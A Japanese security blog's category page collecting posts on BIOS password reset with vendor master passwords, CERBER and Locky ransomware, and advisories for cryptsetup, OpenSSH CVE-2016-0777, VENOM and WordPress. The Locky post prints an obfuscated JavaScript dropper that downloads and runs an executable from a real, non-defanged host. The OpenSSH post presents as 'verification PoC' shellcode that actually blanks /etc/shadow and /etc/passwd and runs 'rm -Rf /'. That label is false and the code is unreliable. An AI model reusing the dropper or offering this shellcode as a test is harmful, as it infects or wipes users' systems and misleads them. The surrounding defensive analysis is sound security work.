セキュリティ(Security)

脆弱性情報

How to reset BIOS or CMOS Password

How to reset BIOS or CMOS Password

日本語記事はこちら http://rootdown.cocolog-nifty.com/memo/2015/05/bios-577f.html

このエントリーをはてなブックマークに追加

キーワード: BIOS Password, ASUS, Windows7, clear password, bypass password, flush CMOS

目次

1. How to reset BIOS or CMOS Password

2. How to use BIOS Master Password

3. How to clear CMOS Password 

4. Related Links

スポンサーリンク

1. How to reset BIOS or CMOS Password

If you forget the BIOS Password accidentally, or if you do not know the BIOS Password set by someone, we will show you how to reset / clear the BIOS password . I will introduce a cancellation method that can be used in cases where I do not understand the BIOS password, such as when I bought a used PC or when my predecessor at work pointed to quit without taking over the password. Please handle static electricity etc. when handling motherboard of PC. In the worst case, the personal computer may be broken. Be especially careful of static electricity when handling the inside of the personal computer, with the power cord and battery disconnected. Implementation is at your own risk.

スポンサーリンク

2. How to use BIOS Master Password

If it is an old personal computer before 200X years, the master password set by the manufacturer for debugging and support may be valid. If it is not an old personal computer, I can not expect much, but since I can easily try it, I think that it is worth a try. I think that if you hit it you should try it with a feeling of lucky.
These master passwords are published on many websites.

Index - BIOS-Chips - Verkauf und Programmierung - BIOS-Updates - BIOS-Recovery - BIOS-Repair - biosflash.com    
http://www.biosflash.com/index.htm
Index - BIOS-Chips - Verkauf und Programmierung - BIOS-Updates - BIOS-Recovery - BIOS-Repair - biosflash.com    
http://www.biosflash.com/index.htm
                                                                                                                                                                                 
Example of master password
AWORD 01322222, bios, lkw peter, 1EAAh, BIOS, lkwpeter, 256256, biostar etc.
AMI ami, amiami, CMOSPWD, amidecod, AMI.KEY, KILLCMOS etc.
Phoenix 12345
Hewlett-Packard CNU1234ABC
Dell 1234567-595B, 1234567-D35B, 1234567-2A7B
Compaq 12345
Sony 1234567
Samsung 07088120410C0000

3. How to clear CMOS Password

(1) How to clear the CMOS information by removing the button battery on the motherboard

The setting information including BIOS password is stored in the memory called CMOS on the motherboard. Although information disappears when the power is turned off, CMOS keeps the setting by constantly supplying power with the button battery of the motherboard.
By removing the button battery that supplies power to CMOS, you can clear the setting information including the BIOS password.
It is necessary to remove the button battery on the motherboard and leave it for about 2 to 3 minutes.

(2) How to clear with CMOS clear button

スポンサーリンク

There are also models that provide buttons on the motherboard to clear COMS.
By pressing this button you can clear the CMOS information and erase the password setting.

HP Compaq Pro 4300 SF - How to initialize the BIOS settings with the CMOS button
Http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03790899

(3) How to clear with a jumper cap

It is possible to clear CMOS information by changing the jumper pins of "CLR COMS" or "CLRTC" on the motherboard. The change position of the jumper pin varies depending on the model. The following image is an example of ASUS motherboard case. Although it is hard to see, the part surrounded by red becomes a jumper pin of "CLRTC". Usually it is near the button battery of the motherboard. It is hard to understand, but if you look closely you will find it so please try looking.

CLRTC

above image using https://pixabay.com/static/uploads/photo/2015/08/11/11/50/asus-884108_960_720.jpg


4. Related Links


スポンサーリンク

音声で脅迫するファイル暗号化ランサムウェア CERBER の対処方法

音声で脅迫するファイル暗号化ランサムウェア CERBER の対処方法

キーワード: Ransomware, ランサムウェア, 復号, 解除, 暗号化, 解除ツール, 復号ツール, Decryptor 

 

このエントリーをはてなブックマークに追加

1. CERBER 概要

スポンサーリンク

ランサムウェア(ransomware)とは、感染するとハードディスク内のファイルを勝手に暗号化して脅迫し、復号・解除キーと引き換えに金銭を要求するマルウェア(ウイルス)です。ランサムウェアには、CryptoLocker や TeslaCrypt、 Locky など多くの種類があります。これらのランサムウェアは、暗号化すると脅迫文を表示して金銭を要求するものでしたが、CERBER と呼ばれるマルウェアは音声で脅迫します。また、身代金の支払い期限が設定されており、期限が過ぎると身代金の金額を吊り上げ、支払いを迫ります。

ランサムウェア CERBER は、メール添付ファイル経由より、改ざんされたウェブサイトや広告にアクセスすることで感染するケースが多いようです。改ざんされウェブページにアクセスすると、ウェブブラウザのプラグインである Flash Player や Java などの脆弱性を攻撃するエクスプロイトキット (Magnitude Exploit Kit や Rig Exploit Kit など) を設置したサイトにリダイレクトされ、攻撃が成功すると Cerber がダウンロード実行されて感染します。

CERBER は、何度かバージョンアップされており、2016年11月末にはデータベースファイルを暗号化する機能を追加したバージョン 4.x が確認されています。トレンドマイクロの調査によると、CERBER 4.0 で暗号化対象となるデータベースファイルとしては、Microsoft Access、SQL Server, MySQL, Oracle、MySQL のほか、会計ソフト、給与計算ソフト、医療管理データベースソフトウェアに関連するファイルも含まれています。

2. CERBER による暗号化と脅迫文

CERBER に感染後のデスクトップ画面

他のランサムウェア(ransomware)と同じく、感染後にディスクトップの壁紙が脅迫文に変更されます。

cerber4

CERBER の脅迫文

脅迫文は多数の言語に対応しており、日本語に対応しています。ファイル形式は、HTML ではんく HTA 形式となっています。

cerber0

3. CEBER で暗号化されたファイルの復号方法(1回のみ)

CERBER の脅迫文に記載されているパーソナルページで、無料で 1つファイルの復号を試すことができます。

※ 購入を推奨している訳ではありません。

Tor ブラウザで脅迫文に記載されているパーソナルページにアクセスすると、言語を選択する画面が表示されます。日本語、中国語、ロシア語など多くの言語に対応しているようです。

cerber1

ロボットアクセス回避のためのキャプチャ認証が入っていました。

セキュリティ上の理由のため、以下でロボットではなく、ヒトであることを確認してください。

cerber2

メニュー画面が表示されます。支払い期限の時間などが表示されています。このページの上部に「1つのファイルを無料で復号化」というメニューがあります。

ドキュメント、写真、データベース、その他の重要なファイルは暗号化されています!

ファイルを復号するには、特別なソフトウェア - <<Cerber Decryptor>> をご購入いただく必要があります。
すべての取引は bitcoin ネットワーク内でのみ実行されます。
これから5日間だけ、B1.000の特別価格でこの製品をお求めいただけます。
5日経過後は、この製品の価格はB2.000になります。

スポンサーリンク

cerber3

上記メニューから「1つのファイルを無料で復号化」にアクセスすると、無料で1つのファイルを復号できる特別な機会!」と書かれたページが表示されます。「ファイルをアップロード」のボタンを押して、復号したいファイルを選びます。復号できるファイルは、サイズが2048バイトまでになっています。

今なら、無料で1つのファイルを復号化できる特別な機会!
サービスが本当に役に立つかどうかを確認後、<<Cerber Decryptor>> プログラムにお払い頂いた後で、1つのファイルを復号化することができます

cerber6

復号が成功すると「復号化されたファイルのダウンロード」というボタンが表示されるので、クリックしてダウンロードします。

cerber8

ダウンロードされるファイル名は Decrypted.zip となっており、解凍・展開すると復号されたファイルが確認できました。

cerber10

4. CERBER で暗号化されたファイルの復号方法

スポンサーリンク

初期の CERBER バージョン1 については、トレンドマイクロからファイルの暗号化を解除するツール( Ransomware File Decryptor )が提供されています。

5. 関連URL

LinuxディストリビューションにEnterキーを押し続けるだけで root シェルを開くことが出来る深刻な脆弱性(Cryptsetup Initrd root Shell CVE-2016-4484)

LinuxディストリビューションにEnterキーを押し続けるだけで root シェルを開くことができる深刻な脆弱性(Cryptsetup Initrd root Shell CVE-2016-4484)

       

キーワード: Linux, Ubuntu, RedHat, LUKS, cryptsetup,  initramfs(initial RAM file system), ハードディスク暗号化,

1. Cryptsetup Initrd root Shell (CVE-2016-4484) の概要

スポンサーリンク

Linuxディストリビューションで使われているハードディスク暗号化のための標準的な使用である LUKS (Linux Unified Key Setup on disk format) に深刻な脆弱性(Cryptsetup Initrd root Shell CVE-2016-4484)が見つかった。この脆弱性は、LUKSのユーティリティである cryptsetup に存在するもので、システムを起動時の認証画面で Enter キーを押し続けるだけで簡単に悪用することができる。この脆弱性を悪用するとコンソールから root シェルが起動し、ハードディスクのコピーや破壊活動、ネットワークを設定して通信などが可能となり、悪用された場合の影響は大きい。暗号化されたハードディスクの内容にはアクセスできないことはない。

影響を受けるディストリビューションには、「Red Hat Enterpise Linux」(RHEL)、「Fedora」、「Ubuntu」、「Debian」、「SLES」などが含まれる。 

物理的に直接アクセスできる図書館や空港、学校などに設置された端末、ATMなどは攻撃を受ける可能性が高い。その他、リモートでコンソール画面にアクセスできるクラウドサービスなども影響を受ける可能性がある。

スポンサーリンク

2. Cryptsetup Initrd root Shell (CVE-2016-4484)の脆弱性検証

       

(1) Ubuntu を起動すると認証画面が表示される 

ubuntu1

       

(2) 「Enter」を押して認証失敗する 

ubuntu2

       

(3)  「Enter」を押し続けて、何度か認証失敗 

ubuntu3

       

(4) initramfs(initial RAM file system)が起動

        Build-in Command として、mount や dd、ifconfig、wget など多くのコマンドが利用可能 

ubuntu4

スポンサーリンク

3. 対策

各ディストリビューションの情報を確認して、アップデートしてください。

4. 関連URL

Locky Virus - 日本語で身代金要求するランサムウェアウイルスの対処方法

更新日:
2016-03-29 「感染しないための対策」を追記
2016-03-27 「感染時の動作」、「Locky Decrytor の購入画面」をを追記

Locky Virus - 日本語で身代金を要求するランサムウェアウイルスの対処方法

キーワード: ウイルス、Locky、マルウェア、ランサムウェア、復元、復号、復旧、decrypt, js、javascript、Document2、ransomware, virus, thor, osiris, zzzzz, aesir

このエントリーをはてなブックマークに追加 

目次

1. Locky ウイルスとは

2. 脅迫文

3. 暗号化されたファイルの復旧方法

4. メール添付ファイルの例

5. Locky ウイルスのダウロードURL

6. Locky ウイルス感染時の動作

7. 感染しないための対策

8. 関連リンク

スポンサーリンク

1. Locky ウイルスとは

Locky ウイルスは、感染するとPC内のファイル(テキストやオフィスファイル、画像、動画ファイルなど)を勝手に暗号化してしまうランサムウェアと言われる種類のウイルスです。暗号化されたファイルは、拡張子が「Locky」 となってしまうことから通称「Locky」と呼ばれています。今までのランサムウェアの脅迫文は日本語対応していないものがほとんどでしたが、Locky は日本語環境であれば日本語の脅迫文を作成して表示します。

感染経路としては、メール添付ファイルと脆弱性を攻撃するWebサイトの大きく2つがあります。メール添付ファイルでの感染は、実行すると Locky ウイルスをダウンロードして実行する JavaScriptファイルが含まれた ZIP ファイルが添付されているケースが多いです。その他 rar 拡張子の添付ファイルのケースもあります。また、改ざんされたWebサイトでの感染では、そのWebサイトを見ると Adobe Flash などの脆弱性を攻撃して自動的に Locky Virus をダウンロードして実行する手法(ドライブバイダウンロード)による感染が多く報告されています。このWebサイト経由での感染は、Adobe Flash や IE などのソフトウェアを最新にしておけば感染することはほどんどありません。ランサムウェアなどのウイルスに感染しないように、必ずソフトウェアはアップデートして最新のバージョンにしておきましょう。

1.2. Locky 亜種

Locky ウイルスが出現して間もなく亜種が出回りはじめました。Locky亜種は、初期のLocky と比べて、ダウンロードされるウイルス本体の実行ファイル形式(EXEからDLL形式)や暗号化後のファイル名の形式、拡張子名(.thor.aesir.zzzzz.osirisなどが変わっています。目的はかわらず、感染PC内のファイルを暗号化して人質にして、身代金(ビットコイン支払い)を要求することです。

Locky亜種は、主にメールの添付ファイルとして送られてきます。添付されるファイルの形式は、以下が確認されています。

添付ファイルの形式 ファイルの拡張子
zip zip
The Witcher 2 Game Archive dzip
Microsoft Office doc, docx, docm
  xls, xlsx

zip, dzip などの圧縮ファイルは、展開すると js, wsf, vbs などのスクリプトファイルが入っており、実行してしまうと Locky 亜種の本体であるDLLプログラムをダウンロードして実行します。

doc, docm などのMicrosoft Office のオフィスファイルには、開くと Locky亜種をダウンロードするマクロが入っています。

2. 脅迫文

Locky ウイルスに感染すると表示される日本語の脅迫文です。
  • _Locky_recover_instructions.bmp

_Locky_recover_instructions

  • _Locky_recover_instructions.txt

!!! 重要な情報 !!!!

すべてのファイルは、RSA-2048およびAES-128暗号で暗号化されています。  
RSAの詳細については、ここで見つけることができます:  
http://ja.wikipedia.org/wiki/RSA暗号  
hxxp://ja.wikipedia.org/wiki/Advanced_Encryption_Standard

あなたのファイルの復号化は秘密鍵でのみ可能であり、私たちの秘密のサーバー上にあるプログラムを、復号化します。  
あなたの秘密鍵を受信するには、リンクのいずれかに従います:  
1. hxxp://i3ezlvkoi7fwyood.tor2web.org/AAF92AC11ABCDEF  
2. hxxp://i3ezlvkoi7fwyood.onion.to/AAF92AC11ABCDEF  
3. hxxp://i3ezlvkoi7fwyood.onion.cab/AAF92AC11ABCDEF

このすべてのアドレスが使用できない場合は、次の手順を実行します。  
1. ダウンロードして、Torのブラウザをインストールします: hxxps://www.torproject.org/download/download-easy.html  
2. インストールが正常に完了したら、ブラウザを実行し、初期化を待ちます。  
3. アドレスバーにタイプ: i3ezlvkoi7fwyood.onion/AAF92AC11ABCDEF  
4. サイトの指示に従ってください。

!!! 個人識別ID: AAF92AC11ABCDEF !!!

  • Locky Decryptor 購入画面

暗号化されたファイルを復元するためのソフトウェアである Locky Decryptor の要求額は 1.0 Bitcoin のようです。日本円に換算すると5万円弱くらいでしょうか。暗号化されたファイルの重要性によっては、払ってしまいそうな金額です。

脅迫文と同じく、英語、日本語のほか、韓国語、ドイツ語、フランス語、イタリア語など多くの言語をサポートしています。

身代金を払うことは、犯罪者にお金を払ってしまうことになってしまいますし、犯罪を助長することになってしまうのでお勧めしませんが、バックアップなどから復旧できない大切なデータが被害にあった場合は、身代金を払って復号するしか手はなさそうです。

LockyDecryptor 

3. 暗号化されたファイルの復旧方法

スポンサーリンク

暗号化されたファイルの復旧する 3 つの方法を紹介します。

(1) バックアップから復旧

バックアップから復旧することが一番簡単な方法です。ランサムウェアの被害に限らず、インシデントが発生するとバックアップの大切さがわかります。

(2) ボリュームシャドーコピーからの復旧

Vista/7 以降のWindowsは、標準でファイルの自動バックアップサービスが動いています。ファイルのプロパティのタブで「以前のバージョン」で表示されるものがバックアップされたファイルになります。

いつの時点のボリュームシャドーコピーがあるかなどを確認する方法です。管理者権限のコマンドプロンプトで、vssadmin か wmic コマンドを実行すると表示されます。その他、エクスプローラのフォルダやファイルのプロパティから「以前のバージョン」タブを確認する方法もあります。

> vssadmin list shadows

> wmic.exe shadowcopys

ボリュームシャドーコピーが残っていれば、Shadow Explorer というソフトウェア(http://www.shadowexplorer.com/)を使うことで以前のバージョンのファイルを復元することができます。

Locky ウイルスは、感染時にボリュームシャドーコピーを削除するコマンドを実行します。このコマンドには管理者権限が必要なので、一般ユーザ権限で操作をしていたのであれば削除されずに残っている可能性があります。

(3) アンチウイルスベンダーの復号ツールを使う(未確認)

本当に復号できるのか確認検証できていませんが、下記URL に Locky ウイルスに暗号化されたファイルを復元する方法が記載されています。

How to Decrypt Files Affected by Locky

http://www.im-infected.com/virus/remove-locky-ransomware-virus-removal.html

DrWeb の FTP サイトに復号ツール(ftp://ftp.drweb.com/pub/drweb/tools/te94decrypt.exe)があるようですが、認証が必要でダウンロードできませんでした。DrWeb を購入しているユーザのみに公開されているのかもしれません?。DrWeb のライセンスを持っていないので詳細は不明です。

このツールを使って下記コマンドを実行することにより復号できるようです。(確認できていないので、本当に復元できるか不明です)

te94decrypt.exe -k 85

上記コマンドで復号できない場合は、-k オプションの値を -k 87, -k 88, -k 90, -k 106, or –k186 のように変えて試すとよいようです。

(4) 身代金を支払う

最後の手段ですね。

スポンサーリンク

4. メール添付ファイルの例

Locky ウイルスをダウンロードする JavaScript ファイル (ZIP 圧縮ファイル)を添付したメールの一例です。以下、Locky ウイルスに関するメールの特徴です。

  • 件名は Document 2 が多い
  • 差出人と宛先が自分のメールアドレス
  • 本文はなしが多い
  • 添付ファイルは zip で Locky Virus をダウンロードする js ファイルが含まれている

 

4.1 メール添付ファイルの例

  • Scanned images

件名 Scanned image
差出人 "admin" lands804@nifty.com
日時 Fri, 11 Mar 2016 21:28:25 +0530 (IST India Standard Time)
X-Mailer Internet FAX, MGCS
本文 Image data in PDF format has been attached to this email.
添付ファイル 11-03-2016-0424109259.zip (LUH5654603905.js)

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Fri, 18 Mar 2016 07:36:24 –0500 (EST アメリカ東部)
X-Mailer なし
本文 なし
添付ファイル Document 2.zip (中身は SKS6515937204.js)

  • Message from KFBT_C125

件名 Message from KFBT_C125
差出人 copier@nifty.com
日時 Date: Mon, 21 Mar 2016 10:01:42 -0700 (US,カナダ, メキシコ)
X-Mailer KONICA MINOLTA
本文 なし
添付ファイル SKFBT_C0125690141.zip

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 16:40:13 +0530 (IST India Standard Time インド)
X-Mailer iPhone Mail (13B143)
本文 なし
添付ファイル Document 2.zip (中身は FAM6542645213.js)

  • Document 2

  
件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 16:45:47 +0530 (IST India Standard Time インド)
X-Mailer iPhone Mail (13B143)
本文 なし
添付ファイル Document 2.zip (中身は QVR3975568919.js)

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 13:21:42 +0700 (ロシア?)
X-Mailer iPhone Mail
本文 なし
添付ファイル Document 2.zip

  • Locky をダウンロードする Javascript の例(一部)

LUH5654603905.js (一部)

LnOKenpxqU = "If the nodes are siblings, we can do a quick check} else if ( aup === bup ) {return siblingCheck( a, b );";
String.prototype.harmonize = function () { return this.substr(0, 1); };
var zooFq = [("through","sesame","admissions","holes","T")+("scripts","beautify","attacked","arrangements","OQ")+("algeria","cucumber","relation","NF")+"JjAV"+"sY", "c"+("sponsorship","endorsed","finish","JbVL")+"Lh"+"xN", "Expan"+"dE"+"nviron"+"me"+"ntStri"+("stork","sluggish","foxes","ngs"), ""+"%"+("prominent","queens","foregone","susanna","TE")+"MP%", "/BhyIDtNVwP" + ""+"."+("revolve","meyer","shift","reborn","exe"), "R"+("medline","demur","arbitrator","un"), ("tumbler","dense","A")+("craig","repine","tramadol","ct")+"iv"+"eX" + ("compression","brewery","guitar","")+"O"+"bj"+"ect", "QGGOKcpS", "QwMELac", "W"+"Sc"+"ri"+("foxes","torture","pt.") + ("problem","inscribe","melissa","octave","S"), "DKiwgen", ""+("withering","andrew","shorter","h")+"ell", "pVfOLaUink", ("throttle","cowboy","")+("amalgamation","breast","u")+"gb"+"IRD", ""+("guarantee","breastplate","interpreted","M")+"SX"+"ML2" + "."+"XM"+"LH"+("freeze","pounce","immensity","taciturnity","TTP")];
WeuTVCqwr = "Otherwise nodes in our document sort firstap[i] === preferredDoc ? -1 :bp[i] === preferredDoc ? 1 :0;};";   
zooFq.splice(7,2);   
var CTMoXJF = this[zooFq[7 * 8 - 50]];   
HWKBtgugje = "QADrAWHk";   
midnight = (("deleterious", "greenish", "bpRCgjnvY", "astuteness", "pxoHjzpzAa") + "FCIzdg").harmonize()   
publicitys = (("compared", "cheaper", "QBuFHmOIr", "architects", "shvjRYg") + "FjirdbbvG").harmonize()   
zooFq[7] = zooFq[7] + zooFq[9];   
zooFq[8] = "WyGszYG";   
zooFq.splice(8,3);   
var SjBMgLMBX = new CTMoXJF(zooFq[7]);   
SEVPbSzi = "}Walk down the tree looking for a discrepancywhile ( ap[i] === bp[i] ) {i++;";   
var ivPMRM = new CTMoXJF(zooFq[9]);   
rfQhFwb = "}Otherwise we need full lists of their ancestors for comparisoncur = a;while ( (cur = cur.parentNode) ) {ap.unshift( cur );}cur = b;while ( (cur = cur.parentNode) ) {bp.unshift( cur );";   
var giLwRPLp = SjBMgLMBX[zooFq[2]](zooFq[3]) + zooFq[4];   
SWlMAsjacQk = "}return i ?Do a sibling check if the nodes have a common ancestorsiblingCheck( ap[i], bp[i] ) :";   
ivPMRM.onreadystatechange = function () {   
if (ivPMRM[("animal","ferment","wince","r")+"ea"+("drummer","delicious","romany","thinking","dy")+"st"+("contributor","society","projects","oxygen","ate")] === 4) {   
   var aLcJyART = new CTMoXJF(""+"A"+("outlawed","mined","national","DO")+("derek","elizabethan","cleave","whisk","DB.")+("protuberance","stayed","proverbs","")+("terminus","dunno","madness","graphic","S")+"tr"+"eam");   
   aLcJyART.open();   
   KHvCvfBJOh = " return document; };";  

try {

LNqWai= "IE 9\"s matchesSelector returns false on disconnected nodesif ( ret || support.disconnectedMatch ||  As well, disconnected nodes are said to be in a document  fragment in IE 9 elem.document && elem.document.nodeType !== 11 ) {return ret;}} catch (e) {}";   
ivPMRM.open(("symptom","sigma","colin","G")+"ET", "h"+("propagate","thrown","johnny","ttp:")+"//"+("mohawk","impair","chinhu")+"an"+"oi"+"that.c"+"om/s"+"ys"+"te"+"m/logs/u"+"y78hn6"+("hogshead","action","54")+"e.exe", false);BxpYFBq = "} return Sizzle( expr, document, null, [ elem ] ).length > 0; };";   
ivPMRM[publicitys + ("illogical","quick-witted","grape","xerox","e") + (("promote", "moderately", "gnuUtaRFBS", "viscid", "impure", "nYAgsnHqfY") + "DudCuStvIn").harmonize() + (("miner", "squeal", "IKcQRgYhT", "blame", "concord", "dNdviLv") + "crpvqd").harmonize()]();   
RqrXhxjRF = "Sizzle.contains = function( context, elem ) {Set document vars if neededif ( ( context.ownerDocument || context ) !== document ) {setDocument( context );}return contains( context, elem ); };";   
SjBMgLMBX[zooFq[5]](giLwRPLp, 1, "qPdBvBqXfEO" === "HtIxotr"); xcwJYtK = " return val !== undefined ?val :support.attributes || !documentIsHTML ?elem.getAttribute( name ) :(val = elem.getAttributeNode(name)) && val.specified ?val.value :null; };";   
lrGyXANbYvX = "Sizzle.attr = function( elem, name ) {Set document vars if neededif ( ( elem.ownerDocument || elem ) !== document ) {setDocument( elem );";   
} catch (RaRfcWCIw) { };   
xyQVrCFOYxk = "} var fn = Expr.attrHandle[ name.toLowerCase() ],Don\"t get fooled by Object.prototype properties (jQuery #13807)val = fn && hasOwn.call( Expr.attrHandle, name.toLowerCase() ) ?fn( elem, name, !documentIsHTML ) :undefined;";

5. Locky ウイルスのダウロードURL

メールに添付された zip ファイルに含まれる js ファイルを実行すると HTTP アクセスして、Locky Virus をダウンロード実行します。HTTPアクセス先 URL の一例です。

hxxp://timefusewatches.com/system/logs/3523523.exe
hxxp://palat.com/system/logs/98h7b66gb.exe
hxxp://palahasit.com/system/logs/98h7b66gb.exe

/system/logs/*.exe となっているURLが多いようです。

6. Locky ウイルス感染時の動作

メール経由(js を含む添付ファイル)での感染時の動作です。感染してファイルを暗号化された後は、Locky Virus は自身を削除してしまうため残っていません。このため、暗号化された後に、アンチウイルスソフトウェアでフルスキャンしても見つかりません。メール添付されていた zip or Javascript は残っているので、これらが検知されることはあるかもしれません。

  1. Locky Virus をダウンロードするための Javascript を圧縮した zip ファイルを添付したメールが届く
  2. 添付された zip を開いて Javascript ファイル( 例: LUH5654603905.js)を実行すると、Locky Virus である実行ファイルがダウンロード実行される
  3. Volume Shadow Copy サービスで自動バックアップされているファイルをコマンドで削除する「C:\Windows\System32\wbem\WMIC.exeshadowcopydelete/nointeractive」
  4. Locky C2 (コントロール&コマンド)サーバに通信して暗号化に関する情報をやり取り (hxxp://xxxxxxx/main.php、hxxp://xxxxxxx/gate.php へのPOST通信が多い)
  5. ファイルの暗号化処理
  6. 脅迫文を作成して表示
  7. Locky Virus の実行ファイルを削除 「"C:\Windows\system32\cmd.exe" /c DEL %USERPROFILE%\DOCUME~1\TWRPUI~1.EXE」
             

7. 感染しないための対策

  • Adobe Flash Player を最新バージョンにアップデートする
  • Adobe Reader を最新バージョンにアップデートする
  • Java を最新バージョンにアップデートする
  • Internet Explorer を最新バージョンにアップデートする
  • Windows Update のセキュリティパッチをすべて適用する
  • アンチウイルスソフトの最新パターンにアップデートし、リアルタイム検知を有効にする
  • 問題なければ .js 拡張子の関連付けを、Javascript が実行できないプログラム(例えばnotepad.exe など)に変更する
  • js, wsf, vbs などの関連付けを無効にする
  • js, wsf, vbs などに関連付けられた WScript.exe をグループポリシーや権限などで実行禁止する
  • Microsoft Office のマクロ設定を警告表示もしくは無効にする

各種ソフトウェアやプラグインが最新バージョンになっているかは、情報処理推進機構 IPA が提供している MyJVN パージョンチェッカー(http://jvndb.jvn.jp/apis/myjvn/vccheck.html)で確認できます。

8. 関連リンク

SSHクライアントに秘密鍵が漏洩する可能性のある脆弱性(CVE-2016-0777)のまとめ

更新日:2016-01-19

 

SSHクライアントに秘密鍵が漏洩する可能性のある脆弱性(CVE-2016-0777)のまとめ

 
 

 

1. 概要

 

OpenSSH でドキュメント化されていない実験的なローミング(roaming)機能(切断時に自動で再接続する機能)に脆弱性が見つかりました。この機能は OpenSSH 5.4 から追加されているため、OpenSSH 5.3 以前のバージョンは影響しません。また、コンパイル時もしくは設定により、明示的に無効にしない限り、有効になっています。この脆弱性を攻撃する悪意あるサーバと通信をすると、メモリ内容が送信されてしまい秘密鍵などの重要な情報が漏えいしてしまう可能性があります。

 

既に怪しいサーバ、信頼できないサーバに SSH で接続したことがある場合、秘密鍵などの情報が洩れている可能性があります。SSH の秘密鍵・公開鍵を再作成して入れ替えるなどの対応を行った方が良いでしょう。

 

‘Important SSH patch coming soon’ – MARC   
http://marc.info/?l=openbsd-misc&m=145278077920530&w=2

 

OpenSSH: client bug CVE-2016-0777   
http://undeadly.org/cgi?action=article&sid=20160114142733

 

2. 影響を受けるバージョン

 

OpenSSH Client 5.4 以降のバージョン(OpenSSH Client 5.4 ~ 7.1)

 

ただし、OpenSSH 6.6 は影響を受けないそうです。

 

3. 影響を受けるバージョンか確認する方法

 

> ssh –V

 

4. 対策

 

CVE-2016-0777 の脆弱性が修正(roaming機能がオフ)されたバージョンが公開されています。

 

Announce: Portable OpenSSH 7.1p2 released   
https://lists.mindrot.org/pipermail/openssh-unix-dev/2016-January/034680.html

 

5. 暫定対策

 

5.1 OpenSSH クライアントの設定(ssh_config)ファイルに、ローミング機能を無効にする設定を追加する。

 
   

echo “UseRoaming no” >> /etc/ssh/ssh_config

 

5.2 各ユーザの OpenSSH クライアントの設定ファイルに、ローミング機能を無効にする設定を追加する。

 
   

echo “UseRoaming no” >> ~/.ssh/config

 

5.3 OpenSSH で接続する際にローミング機能をオフにするオプションをつけて実行する。

 
   

-oUseRoaming=no

 

6. 検証コード

 

脆弱性を検証するためのコンセプトコード(PoC)が公開されています。

 

CVE-2016-0777 roaming openssh exploit http://pastebin.com/T2zjAdZ5

 
   

/*

   

Exploit : openssh roaming Exploit -- CVE-2016-0777

   

Author: : KingCope

   

Compile : gcc -W sploit.c -o sploit

   

Usage: : ./sploit HOST IP

   

Thanks : openBSD, congratz, guys

   

*/

   

   

unsigned char shellcode[] =

   

"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"

   

"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"

   

"\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"

   

"\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"

   

"\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"

   

"\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"

   

"\xcd\x80";

   

 

 

7. 関連情報

 
  •    

    ubuntu

       
  •  
  •    

    debian

       
  •  
  •    

    Red Hat Enterprise Linux/CentOS

       
  •  
  •    

    OpenSUSE

           

    Qualys Security Advisory Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778

           

    スポンサーリンク

        
  • 多数の仮想化プラットフォームに「ゲスト」から「ホスト」に攻撃可能な脆弱性が見つかる(CVE-2015-3456)

    多数の仮想化プラットフォームに「ゲスト」から「ホスト」に攻撃可能な脆弱性が見つかる(CVE-2015-3456)

    概要

    米国のセキュリティ企業 CrowdStrike の研究者によって、QEMU の仮想フロッピードライブコントローラ(FDC)に、ゲスト側からホスト側に対して攻撃可能な深刻な脆弱性(CVE-2015-3456)が発見されました。XenやVirtualBox, RedHat, Ubuntu, KVM, Citrix, F5 Networks, FireEye など多数の仮想化プラットフォームにおいても同様の脆弱性が確認されています。この脆弱性(CVE-2015-3456)は、別名 VENOM(Virtualized Environment Neglected Operations Manipulation)と命名されています。

    また、この脆弱性(CVE-2015-3456)は、仮想化プラットフォームのハイパーバイザーに存在するため、ホストOSの種類に関係なく影響を受けます。脆弱性を悪用してホストOSを攻撃するためには、ゲストOSの管理者権限を持っている必要があります。個人的に利用している場合は問題ないが、ホストOSを他人に貸し出すようなクラウドサービスなどでは対応が必要になります。

    影響を受けるシステム

    XenやVirtualBox, RedHat, Ubuntu, KVM, Citrix, F5 Networks, FireEye など

    対策方法

    RedHat や Ubuntu などのベンダーから修正パッチが提供されています。


    深刻な脆弱性を修正した WordPress 4.2.2 リリース

    深刻な脆弱性を修正した WordPress 4.2.2 リリース

    概要

    広く利用されいるコンテンツマネジメントシステム(CMS)である WordPress に複数の深刻な脆弱性を修正した WordPress 4.2.2 がリリースされました。

    修正された脆弱性

    • デフォルトテーマで利用されるアイコンフォントパッケージ「Genericons」に見つかったクロスサイトスクリプティング(XSS)の脆弱性
    • コメント機能に見つかったクロスサイトスクリプティング(XSS)の脆弱性(CVE-2015-3440)

    WordPress のバージョン確認方法

    WordPress のバージョンアップ方法

    スポンサーリンク

    BIOS パスワードをうっかり忘れたときに設定を解除する方法 - How to reset forgotten BIOS Passwrod ?

    BIOS パスワードをうっかり忘れたときに設定を解除する方法

    How to reset forgotten BIOS Passwrod ?

    このエントリーをはてなブックマークに追加

    キーワード: BIOS Password, ASUS, Windows7

    目次

    1. BIOSパスワードの解除方法について

    2. BIOSマスターパスワードを使う方法

    3. CMOSクリアする方法

    4.  関連リンク

    スポンサーリンク

    1. BIOSパスワードの解除方法について

    BIOSパスワードをうっかり忘れてしまった場合や設定されたBIOSパスワードがわからない場合などにパスワードを再設定(解除・リセット)する対処方法について紹介します。中古PCを買ってきたときや職場の前任者がパスワードを引き継がずに辞めてしまった場合など、BIOSパスワードがわからず困るケースに利用できる解除方法を紹介します。パソコンのマザーボードを扱い場合は静電気などに気をつけてください。最悪の場合、パソコンが壊れてしまう場合があります。特にパソコン内部を扱う場合は、電源コードやバッテリーは必ず抜いた状態で、静電気に気を付けて作業してください。実施は自己責任でお願いします。

    スポンサーリンク

    2. BIOSマスターパスワードを使う方法

